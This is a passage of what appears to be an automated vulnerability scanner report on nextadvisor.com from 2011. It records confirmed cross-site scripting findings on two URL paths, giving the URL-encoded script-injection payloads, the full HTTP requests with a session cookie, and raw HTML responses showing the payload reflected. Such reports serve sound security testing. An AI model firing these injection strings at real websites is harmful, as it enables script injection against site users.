value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog201..
- /online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E

/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002E9)</script>

Request

GET /online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_meeting/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6669
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online meeting, web conferencing, web conference, video conference, conferencing, internet meeting, Adobe Acrobat Connect Pro, WebEx, Dimdim, Fuze Meeting, GoToMeeting, Yugma, Voxwire" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_meeting/'"--></style></script><script>netsparker(0x0002E9)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002E9)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_meeting_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Meeting FAQ</h1> <p>Frequently Asked Questions about Online Meeting</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Meeting:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_meeting"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog2010..
- /parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E

/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparke..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0002EE)</script>

Request

GET /parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/parental_controls/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:58:33 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6661
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", parental controls, parental control, Net Nanny, Bsecure CloudCare 6.1, SocialShield, WebWatcher, SafeEyes, CyberPatrol, McGruff SafeGuard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/parental_controls/'"--></style></script><script>netsparker(0x0002EE)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0002EE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/parental_controls_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Parental Control Software FAQ</h1> <p>Frequently Asked Questions about Parental Control Software</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Parental Control Software:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="parental_controls"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003